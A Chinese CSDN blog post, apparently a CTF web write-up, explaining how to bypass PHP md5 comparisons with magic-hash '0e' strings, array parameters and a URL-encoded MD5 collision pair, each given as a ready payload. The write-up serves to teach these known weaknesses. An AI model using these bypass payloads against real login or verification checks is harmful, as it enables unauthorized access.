CTF:web题目中的md5弱类型解析

最新推荐文章于 2024-03-20 00:53:31 发布
最新推荐文章于 2024-03-20 00:53:31 发布
阅读量2.9k 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41079177/article/details/89220068
版权

0x00:md5弱比较

在这里插入图片描述
md5弱比较,为0e开头的会被识别为科学记数法,结果均为0

payload:

param1=QNKCDZO&param2=aabg7XSs

0x01:md5强比较

在这里插入图片描述
md5强比较,没有规定字符串如果这个时候传入的是数组不是字符串,md5()函数无法解出其数值并且不会报错,就会得到数值相等;
payload:

param1[]=111&param2[]=222

0x02:真实md5碰撞

在这里插入图片描述
真实md5碰撞,因为此时不能输入数组了,只能输入字符串
payload:

param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

给出两个关于md5碰撞的网站:

md5碰撞1

md5碰撞2

具体的应用方式:

1:网站上有输入框,可以直接post输入;

2:网站没有输入,并且网站请求为GET这个时候可以使用hackbar,或者bp抓包,或者google其他修改插件来完成操作,下面给出关于http请求头的详解网址:

HTTP请求头的具体设置

神林丶
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
CTF_Web:php类型绕过与md5碰撞
AFCC_的博客(Web_Dog)
08-09 3271
0x00 前言 md5碰撞只是一种掌握php类型的方式,类型的内容有很多,数组、字符串比较等等,但不论以哪种方式考,涉及的知识点都是相通的,希望通过对基础知识的分享与大家一同学习进步。 0x01 什么是md5MD5,即消息摘要算法(英语:MD5 Message-Digest Algorithm)。是一种被广泛使用的密码散列函数,将数据(如一段文字)运算变为另一固定长度值,是散列算法的基础原理,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。 显然12
MD5绕过(强类型比较)
weixin_43332695的博客
08-03 6532
文章目录前言一、强类型比较(===)和类型(==)比较区别二、MD5类型绕过1.0e绕过2.数组绕过三、MD5类型绕过1、2、数组绕过四、特定条件下的MD验证绕过:ffifdyop总结 前言 在刷题的时候遇到,强类型比较和MD5的验证,就简单的总结记录一下 一、强类型比较(=)和类型()比较区别 首先,我们来看一下php对类型比较的解释 松散比较也就是类型比较,严格比较就是强类型比较 a==b:类型比较会将a和b转成统一数据类型在进行比较,而强类型比较会先判断a和b是不是相同类型,不是
CTF题型 md5考法&例题汇总
最新发布
qq_39947980的博客
03-20 1148
CTF题型 md5考法相关例题总结
MD5碰撞
ma15848235278的博客
10-24 117
CTF可以说是经常碰到md5加密了,一般都是进行强比较抑或是比较,考法非常多,但是万变不离其。只要我们掌握了原理,一切问题便迎刃而解了。
[安洵杯 2019]easy_webmd5强比较,反斜杠逃逸,绕过cat)
qq_45521281的博客
07-12 776
F12没什么收获,不过看到url有个值很像base64的编码: 拿去解码一下: MzUzNTM1MmU3MDZlNjc= 还是像base64,在解一次: 3535352e706e67 看起来像是hex,拿去转字符串: 555.png 可见,文件名被hex->base64->base64三重编码了,那么我们尝试反加密回去读取index.php index.php—>hex: 696e6465782e706870 再转base64: Njk2ZTY0NjU3ODJlNzA2ODcw.
南邮CTF--md5_碰撞
weixin_33738578的博客
05-18 583
南邮CTF--难题笔记 题目md5 collision (md5 碰撞) 解析: 经过阅读源码后,发现其代码是要求 a !=b 且 md5(a) == md5(b) 才会显示flag,利用PHP语言的类型特性 解:将QNKCDZO进行加密,密文为0e开头,php在进行比较运算时,如果遇到0e\d+这种字符串,就会将字符串解析为科学记数法 即0e都等于0 所以只要找到0e开头的密文就...
md5强比较&比较
m0_75178803的博客
04-24 2943
强比较:使用三个 ''==='' 比较,比较值,也比较类型比较:使用两个 ''=='' 比较,只比较值,不比较类型。所以0e,无论后面跟什么值,都是0。如:2760000=2.76×10^6=2.76e6。密文 原值。QNKCDZO 240610708 常用。计算器表达10的幂一般是用E或e。科学记数法是一种记数的方法。MD5加密登录万能密码。
【PHP】MD5比较漏洞 比较、强比较、强碰撞
EC_Carrot的博客
11-06 6106
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 细节可能还需参考一下师傅这篇文章: https://www.cnblogs.com/kuaile1314/p/11968108.html 比较 if($_POST['param1']!=$_POST['param2']&& md5($_POST['param1'])==md5($_POST['param2'])){ die("succ
MD5强比较和比较
weixin_74427106的博客
03-29 635
a===b 如果a和b的类型不同就会输出flase;a==b会把a和b的值转为一样的数据类型在进行比较;这里为啥第二个怎么不绕过因为intval函数只会返回整数值所以e后面直接忽略所以可以得到flag。这里有两个等号==所以为比较,但是这里没有md5进行转义所以不需要在转为md5所以直接构造。md5()函数计算的是一个字符串的哈希值,对于数组则返回false。对于md5还有数组绕过和上面的绕过方式一样。强比较: === 比较值也比较类型比较: == 只比较值。比较有一下两种绕过方式。
CTFmd5类型(ALL_IN_ONE)
Love&Share
11-20 1万+
CTFmd5 文章目录第一种情况,md5类型比较第二种情况,md5类型比较第三种情况,md5碰撞第四种情况,sql语句md5值暴破其他特殊的hash值(md4、crc32......) 第一种情况,md5类型比较 if(md5($_GET['a'])==md5($_GET['b'])) { var_dump($flag); } 因为是if的判断条件是两个数类型相等,就可以利用hash比较缺陷去绕过 比如 var_dump("0e12345"=="0e66666");//true var_dum
md5碰撞(HECTF ezphp)
qq_47168481的博客
10-31 1589
很惭愧,学了这么久才领会到md5碰撞 参考网站:浅谈md5碰撞 直接上题目 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET['str1']; $string_2 = $_GET['str2']; if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['par
CTF Web各种题目的解题姿势
07-27
课时5:报错注入原理与利用29'27 课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍...
CTF-Web-Challenge:使用PHP在Web进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web进行CTF挑战链接: :
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
aircrack-ng安装使用
热门推荐
欢迎来到神林的博客
04-08 3万+
0x00:aircrack-ng介绍 Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站或[1])并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本...
CTF关于ping命令注入问题(1)
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
CTF题目XOR加密解法脚本
欢迎来到神林的博客
04-10 1万+
0x00:xor加密原理 简单异或密码(英语:simple XOR cipher)是密码学一种简单的加密算法,它按照如下原则进行运算: A {\displaystyle \oplus } \oplus 0 = A A {\displaystyle \oplus } \oplus A = 0 (A {\displaystyle \oplus } \oplus B) {\displaysty...
ctfweb题目docker镜像
11-26
对于这个ctfweb题目,我们可以首先通过命令"docker images"查看当前系统的Docker镜像。然后,我们可以选择这个题目的特定镜像进行分析,使用"docker inspect [镜像ID]"命令获取有关镜像的详细信息。 接下来,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值